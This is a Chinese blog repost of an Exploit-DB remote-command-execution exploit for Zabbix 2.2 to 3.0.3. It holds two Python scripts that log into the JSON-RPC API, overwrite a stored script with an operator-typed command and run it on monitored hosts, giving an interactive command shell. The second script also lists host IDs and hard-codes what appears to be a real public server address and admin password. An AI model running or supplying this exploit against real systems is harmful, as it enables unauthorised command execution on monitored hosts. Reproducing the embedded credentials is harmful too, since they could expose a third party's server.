from:http://0x007.blog.51cto.com/6330498/1839957
漏洞来源: https://www.exploit-db.com/exploits/39937/
攻击成本:高
危害程度:低(此洞需要密码)
利用条件: 需要高权限用户登录
影响范围:2.2 < 3.0.3
tips:
此洞需要你拿到高权限的账户密码,当你拿到账户密码之后,进入后台也可以执行命令,利用API JSON-RPC为第二种方案。
此exp并不是很完美,因为不会自动获取hostid。
#!/usr/bin/env python# -*- coding: utf-8 -*-# Exploit Title: Zabbix RCE with API JSON-RPC# Date: 06-06-2016# Exploit Author: Alexander Gurin# Vendor Homepage: http://www.zabbix.com# Software Link: http://www.zabbix.com/download.php# Version: 2.2 - 3.0.3# Tested on: Linux (Debian, CentOS)# CVE : N/Aimport requestsimport jsonimport readlineZABIX_ROOT = 'http://192.168.66.2' ### Zabbix IP-address login = 'Admin' ### Zabbix login 账户password = 'zabbix' ### Zabbix password 密码hostid = '10084' ### Zabbix hostid 需要指定命令的主机### authpayload = { "jsonrpc" : "2.0", "method" : "user.login", "params": { 'user': ""+login+"", 'password': ""+password+"", }, "auth" : None, "id" : 0,}headers = { 'content-type': 'application/json',}auth = requests.post(url, data=json.dumps(payload), headers=(headers))auth = auth.json()while True: cmd = raw_input('�33[41m[zabbix_cmd]>>: �33[0m ') if cmd == "" : print "Result of last command:" if cmd == "quit" : break### update payload = { "jsonrpc": "2.0", "method": "script.update", "params": { "scriptid": "1", "command": ""+cmd+"" }, "auth" : auth['result'], "id" : 0, } cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))### execute payload = { "jsonrpc": "2.0", "method": "script.execute", "params": { "scriptid": "1", "hostid": ""+hostid+"" }, "auth" : auth['result'], "id" : 0, } cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers)) cmd_exe = cmd_exe.json() print cmd_exe["result"]["value"]修改版本 自动获取hostid
#!/usr/bin/env python2.7#coding=utf-8import jsonimport requestsurl = "http://42.62.97.87/api_jsonrpc.php"header = {"Content-Type": "application/json"}username = 'admin'password = 'haixue!@#'#get auth idpayload = { "jsonrpc" : "2.0", "method" : "user.login", "params": { 'user': ""+username+"", 'password': ""+password+"", }, "auth" : None, "id" : 0,}headers = { 'content-type': 'application/json',}auth = requests.post(url, data=json.dumps(payload), headers=(headers))auth = auth.json()#get hostiddata = { "jsonrpc":"2.0", "method":"host.get", "params":{ "output":["hostid","name"], "filter":{"host":""} }, "auth":""+auth['result']+"", "id":1,}hostid = requests.post(url, data=json.dumps(data), headers=(headers))hostid = hostid.json()print 'uidtname'for hid in hostid['result']: print hid['hostid'],hid['name']#exec commandhostid = raw_input('�33[41m[input_hostid]>>: �33[0m ')while True: cmd = raw_input('�33[41m[zabbix_cmd]>>: �33[0m ') if cmd == "" : print "Result of last command:" if cmd == "quit" : break ### update payload = { "jsonrpc": "2.0", "method": "script.update", "params": { "scriptid": "1", "command": ""+cmd+"" }, "auth" : auth['result'], "id" : 0, } cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers)) ### execute payload = { "jsonrpc": "2.0", "method": "script.execute", "params": { "scriptid": "1", "hostid": ""+hostid+"" }, "auth" : auth['result'], "id" : 0, } cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers)) cmd_exe = cmd_exe.json() print cmd_exe["result"]["value"] if cmd == 'quit': break
本文始发于微信公众号(关注安全技术):Zabbix 2.2 < 3.0.3 - RCE with API JSON-RPC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论